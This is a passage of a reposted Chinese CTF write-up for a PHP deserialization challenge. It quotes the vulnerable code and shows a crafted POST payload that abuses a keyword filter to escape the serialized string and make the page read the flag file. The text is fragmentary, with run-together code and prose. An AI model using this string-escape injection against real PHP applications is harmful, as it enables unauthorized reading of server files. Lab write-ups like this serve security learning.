本文共 2368 字,大约阅读时间需要 7 分钟。
source_code';}if(!$_GET['img_path']){ $_SESSION['img'] = base64_encode('guest_img.png');}else{ $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));}$serialize_info = filter(serialize($_SESSION));# 这里就是题目的名称 序列化了 并且用filter()函数进行了过滤if($function == 'highlight_file'){ highlight_file('index.php');}else if($function == 'phpinfo'){ eval('phpinfo();'); //maybe you can find something in here!}else if($function == 'show_image'){ $userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img'])); # 这里会输出userinfo['img']内容 大概我们要想办法使得这里的值为flag文件}
maybe you can find something in here!
?f=phpinfo
看看有什么好东西 d0g3_f1ag.php
也就是我们要使echo file_get_contents(base64_decode($userinfo['img']));
输出的东西img_path=d0g3_f1ag.php
是没有用的?f=show_image&img_path=d0g3_f1ag.php
$serialize_info = filter(serialize($_SESSION));// serialize_info的值为//a:3:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:3:"img";s:40:"6b9b4b868ded1eb152045ebd5ea11b5be979d3ae";}
Session[img]=ZDBnM19mMWFnLnBocA==
ZDBnM19mMWFnLnBocA==
是d0g3_f1ag.php
的base64编码";extract($_POST);var_dump($_SESSION);?># 第一个var_dump的值array(2) { ["user"]=> string(5) "guest" ["function"]=> NULL}# 如果$_POST为 _SESSION[flag]=1则其值变为array(1) { ["flag"]=> int(1)}
$_SESSION[‘phpflag’]=’;s:1:“1”;s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}’;
$_SESSION[‘img’] = base64_encode(‘guest_img.png’); 序列化得到a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
phpflag
变为";s:48:
值为1img
值为"ZDBnM19mMWFnLnBocA=="
而后面的就被丢弃了array(2) { ["";s:48:"]=> string(1) "1" ["img"]=> string(20) "ZDBnM19mMWFnLnBocA=="}
import hashlibimport base64before = 'guest_img.png'bs64 = base64.b64encode(before.encode('utf-8'))bs64 = str(bs64,encoding='utf-8')print(bs64)sha1 = hashlib.sha1()sha1.update(bs64.encode('utf-8'))print(sha1.hexdigest())
转载地址:http://tywmf.baihongyu.com/